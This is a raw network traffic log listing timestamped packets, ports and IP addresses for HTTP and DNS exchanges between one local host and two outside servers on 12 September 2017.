Sep 12, 2017 22:18:49.717758894 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.717787981 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.724487066 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.724513054 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.724654913 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.724689007 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.738922119 MESZ	53	56587	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:49.741921902 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:49.741996050 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:49.742150068 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:49.743834972 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:49.743884087 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:49.744009972 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:49.745071888 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:49.745102882 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:49.745609045 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:49.745635986 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:49.764573097 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.764605999 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.764812946 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.764842033 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.769995928 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.770037889 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.770138979 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.770165920 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.844552040 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.844567060 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.844661951 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.844685078 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.845226049 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.845244884 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.845402002 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.845416069 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.845427036 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.845544100 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.845566988 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.845614910 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.845628023 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.845946074 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.845964909 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.847121000 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.867357016 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.917026043 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.917043924 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.917160988 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.917177916 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.917354107 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.917365074 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.917534113 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.917550087 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.958077908 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.958115101 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.958127975 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.958317041 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.958355904 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.958631992 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.958651066 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.958823919 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.958867073 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.033703089 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.033740044 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.033940077 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.033981085 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.042150974 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.042186022 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.042397022 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.042445898 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.068808079 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.068844080 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.069051027 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.069088936 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.069506884 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.069539070 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.070431948 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.070466042 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.122710943 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.122739077 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.122919083 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.122945070 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.123837948 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.123855114 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.123979092 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.123997927 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.124111891 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.124128103 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.124540091 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.124557972 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.156086922 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.156114101 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.156127930 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.156263113 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.156286955 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.219463110 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.219492912 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.219692945 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.219734907 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.220052958 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.220078945 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.220199108 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.220228910 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.259721041 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.259751081 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.259761095 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.259881020 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.259910107 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.260516882 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.260533094 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.260942936 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.260958910 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.299787045 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.299817085 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.299927950 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.299951077 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.300865889 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.300883055 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.300961018 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.300978899 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.331624985 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.331656933 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.331825972 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.331844091 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.360734940 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.360773087 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.360790014 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.360893011 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.360908985 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.380503893 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.380537987 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.380654097 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.380672932 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.410969973 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.411093950 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.411603928 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.411628008 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.425270081 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.425290108 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.425471067 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.425503969 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.426776886 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.426789999 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.427506924 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.427547932 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.478220940 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.478247881 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.478769064 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.478799105 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.498845100 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.498864889 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.498965025 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.498986006 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.499252081 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.499268055 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.499361038 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.499382973 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.538866043 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.538883924 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.538889885 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.539006948 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.539031029 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.596772909 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.596818924 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.597033024 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.597064972 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.597090960 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.597112894 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.597127914 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.597229958 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.597244978 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.597481012 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.597515106 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.634675026 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.634707928 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.634871960 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.634919882 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.636780977 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.636800051 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.637250900 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.637289047 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.673604012 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.673633099 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.673727989 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.673754930 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.676120043 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.676140070 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.676515102 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.676531076 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.676547050 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.676558018 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.676584005 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.678934097 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.713388920 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.714673042 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.714699030 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.714818001 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.715471029 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.715502977 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.715516090 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.715655088 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.715861082 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.716288090 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.730638981 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.730675936 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.730684042 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.730885983 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.756345987 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.756388903 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.756421089 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.756591082 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.793776035 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.793987036 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.796035051 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.796057940 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.796072960 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.796339035 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.796355009 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.796364069 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.796444893 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.796458960 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.796587944 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.796617031 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.796633959 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.835685015 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.835726976 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.835746050 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.835932970 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.835975885 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.849988937 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.850029945 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.850439072 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.877762079 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.877784967 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.877791882 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.878010988 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.882308006 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.882320881 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.882330894 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.882697105 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.883282900 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.883492947 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.883507013 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.883735895 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.883769035 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.884253025 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.896955967 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.897142887 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.917578936 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.917608023 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.917617083 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.917768955 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.917802095 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.920710087 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.920747995 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.920767069 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.921026945 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.935885906 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.935924053 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.935933113 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.936239004 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.936777115 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.936815023 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.936831951 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.936920881 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.957521915 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.957787037 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.959959030 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:50.959990978 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.960011959 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.960273027 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:50.960325003 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.960351944 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.974852085 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.974891901 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.975121021 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.975159883 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.975228071 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.975256920 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:50.975591898 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:50.975621939 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.000410080 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.000447035 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.000466108 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.000607014 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.000643015 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.016382933 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.016453028 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.016680002 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.037710905 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.037765980 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.037786961 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.038090944 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.039861917 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.039881945 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.039899111 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.040153980 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.040174961 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.040189028 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.040214062 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.040245056 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.045717001 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.049160957 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.049206972 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.077533960 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.077711105 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.079066038 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.079087973 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.079102039 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.079200029 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.095490932 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.095518112 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.095525026 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.095757961 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.096009970 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.096025944 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.096033096 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.096045017 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.096230984 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.096261978 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.096277952 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.113430023 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.113464117 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.113475084 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.113617897 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.113641977 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.136625051 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.136648893 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.136779070 MESZ	49199	80	192.168.1.16	91.219.236.207
